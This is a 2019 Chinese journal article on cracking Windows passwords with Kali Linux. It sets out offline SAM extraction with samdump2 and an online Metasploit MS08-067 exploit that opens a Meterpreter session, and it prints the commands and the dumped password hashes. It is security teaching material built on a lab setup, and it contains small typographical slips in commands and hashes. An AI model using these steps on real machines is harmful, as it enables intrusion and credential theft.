基于Windows系統的口令破解技術的實現

摘要：該文分析Windows下的口令保存機制，以及常用的破解方法。通過離線和在線兩種方式來實現對口令的破解，實現破解主要基于KALI的攻擊工具。

關鍵詞：口令破解;離線破解;在線破解;kali系統

中圖分類號：TP391 文獻標識碼：A

文章編號：1009-3044（2019）35-0044-02

1 Windows口令安全

隨著計算機使用的普及，使用計算機的人越來越多，雖然有很多操作系統可供選擇，但是現在主流的操作系統主要是Windows。大多數人在使用Windows的時候，會設置登錄Win-dows的密碼，設置的密碼有的比較簡單，例如使用密碼123456、888888、123等等，好一點的可能是使用一些自己的生日以及長度小于8位的字母與數字組合，同時用戶往往不會使用組策略中的安全策略，去設置對密碼猜測破解的防護，更不用說還有用戶直接使用空口令進行登錄，或者一些內置賬號例如guest被允許使用，這樣的一些使用習慣往往導致密碼很容易被各種攻擊方法爆破出來。同時，現在主流的情況下，計算機都是接入網絡使用，而網絡是不安全的，在網絡里有很多攻擊者專門對未加上安全防護的計算機進行攻擊和口令破解，而且攻擊技術和手段現在越來越多，這也造成了Windows口令經常被人破解，從而導致計算機被黑客入侵或者資料泄露，造成很大損失。

2 Windows的口令機制

Windows使用了安全賬號管理器機制，賬號保存在數據庫文件sam文件中，當用戶登錄時候，用戶輸入的賬號信息要與sam數據庫中的記錄一致，才被允許登錄。Sam文件保存在系統目錄%sytem%/system32/config下，在開機狀態下該文件是無法復制的，但是如果是關機狀態下，這個時候可以采取離線攻擊手段，攻擊者很容易通過一些攻擊手段，例如使用kail的live方式登錄，通過kali工具集可以很容易讀取到sam文件，另外即便是開機狀態也可以使用在線攻擊方式，攻擊者通過其他的攻擊方式，例如通過系統漏洞進行攻擊，連接并控制了該計算機，然后可以在線讀取并下載sam數據庫信息。

在WINDOWS下通過工具提取到的密碼hash有兩個，一個是LM-Hash，另外一個是NT-Hash，對應了兩種不同的加密方式。首先談一下LM-Hash以及它的生成原理：密碼首先被轉換為大寫，然后被轉換為16位字符串，這16為字符串被分成兩部分，再通過函數做一次轉換，然后對轉換后的部分再進行一次DES加密，將2組加密后的內容拼接在一起構成LM-Hash值。因為LM口令使用了較弱的DES密鑰和算法，比較容易破解，于是微軟保持了向后兼容性的同時推出了NT-Hash，與LM-Hash相比，NT-Hash對大小寫敏感，由于是向后兼容，通常是兩種方式一起使用。下面再談一下NT-Hash以及它的生成原理：先將密碼轉化成ASCII字符串，再轉換為十六進制字符串，然后轉換成Unicode字符串，最后再對該字符串采用消息摘要算法運算，產生一個16字節的NT-Hash值。

3 口令破解的基本原理

口令破解主要使用社會工程學破解以及暴力破解兩種方式。社會工程學方式主要是盡量多地獲取你的個人信息，例如獲取你的生日、親人生日、電話號碼等，然后通過猜測的方式實現破解。暴力破解主要是通過跑字典來進行，屬于窮舉法的一種，因為字典并不是無限量大的，通常需要采用一些方式來構造字典，可以按照一定的排列方式對字母、數字、特殊字符進行組合。另外還有一種方式采用彩虹表來構造字典，彩虹表實際上是字典的HASH值表達方式，并且對排列方式進行了一些優化，而且在彩虹表中查找的時候也采用了優化方式。因為采用字典方式破解的時候實際上需要把口令字符串組合先轉換成HASH值，再和系統中的HASH值進行比對，如果直接把HASH值保存在字典中，這樣就不需要先進行轉換，所以計算機在運算時候可以少做一次HASH轉換，這樣可以大大增加破解速度，同時查詢字典的方式得到優化，所以彩虹表的效率比字典要高。總體而言，破解的成功率取決于字典的構造方式、大小和計算機的硬件條件（現在有些破解需要CPU支持）和運行速度。

4 口令破解的實現

4.1離線方式實現破解Windows系統口令

離線口令攻擊通過獲取計算機上sam文件信息，然后使用相應工具對sam進行破解。筆者采用虛擬機上完成攻擊，離線破解WIN7口令。首先通過BIOS設定WIN7虛擬機的啟動方式為CD-ROM Drive，定位Kali的ISO為虛擬光盤，啟動時候選擇kali的live方式，登錄到kaili后，執行如下命令：

root@kali：～#mount/dev/sdal/mnt #掛載硬盤到/mnt

root@kali：～#cd/mnt/Windows/System32/config

root@kali：/mnt/Windows/System32/config#samdump2 SAM-o sam.hash#導出sam到sam.hash

可以看到通過系統內置的字典成功破解了幾個用戶。通過john命令還可以顯示Sam.hash文件內容，如下圖所示。

上面命令執行部分的第四第五個字段分別為LM-Hash和NT-Hash。在kali系統下也可以采用ophcrack工具，通過下載的彩虹表進行破解。

4.2在線破解

在線破解方式一般可以通過系統漏洞，利用一些密碼探測工具，例如HYDRA等工具直接破解對方的FTP服務的口令，進而獲得對方系統的賬號和口令，另外也可以通過對系統中存在的漏洞先進行滲透，獲得對方系統的操作權限，從而可以下載對方的sam文件中的信息，直接破解對方口令。下面以Win-dows XP為例，在XP上存在著MS08-067漏洞（通過該漏洞可以遠程控制Windows XP計算機），通過kali系統進行攻擊。攻擊命令如下：

msf5>use exploit/windows/smb/ms08_067_netapi#打開ms08_067攻擊模塊

msf5 exploit（windows/smb/ms08_067_netapi）>set target 34#設置目標計算機類別號

msf5 exploit（windows/smb/ms08_067_netapi）>set thosts192.168.1.6#設置遠程計算機IP

msf5 exploit（windows/smb/ms08_067_netapi）>run#實施攻擊

……

[*]Meterpreter session 1 opened（192.168.1.149：4444→192.168.1.6：1036）at2019-05-28 20：52：31+0800

meterpreter>hashdump#下載口令信息

Administrator：500：aad3b435b51404eeaad3b435b51404ee：31d6cfeOd16ae931b73c59d7eOc089c0：：：

Guest：501：aad3b435b51404eeaad3b435b51404ee：31d6cfeOd16ae931b73c59d7eOc089c0：：：

HelpAssistant：1000：11f3621c220bb15cb613aa94330f1686：4d48771dcOefba71d12cfOa601b297f3：：：

lily：1003：aad3b435b51404eeaad3b435b51404ee：31d6cfeOd16ae931b73c59d7eOc089c0：：：

ls：1005：44efce164ab921caaad3b435b51404ee：32ed87bdb5fdc5e9cba88547376818d4：：：

SUPPORT_388945a0：1002：aad3b435b51404eeaad3b435b51404ee：f4886de5a773e4bac2a9a37dad2d013c：：：

zs：1004：ccf9155e3e7db453aad3b435b51404ee：3dbde697d71690a769204beb12283678：：：

可以看到已經獲得口令hash，然后通過在線網站反查hash值即可以獲得相應賬號的口令。

5 綜述

通過以上分析和對口令破解的實現，如果需要Windows系統口令有一定的安全性，這需要設置強度很高的口令，口令位數和復雜性都需要提高，這樣即便是跑字典破解，破解還是有一定難度的。

【通聯編輯：朱寶貴】

收稿日期：2019-10-15

作者簡介：嚴學軍，講師，碩士，主要研究方向為網絡安全方向等。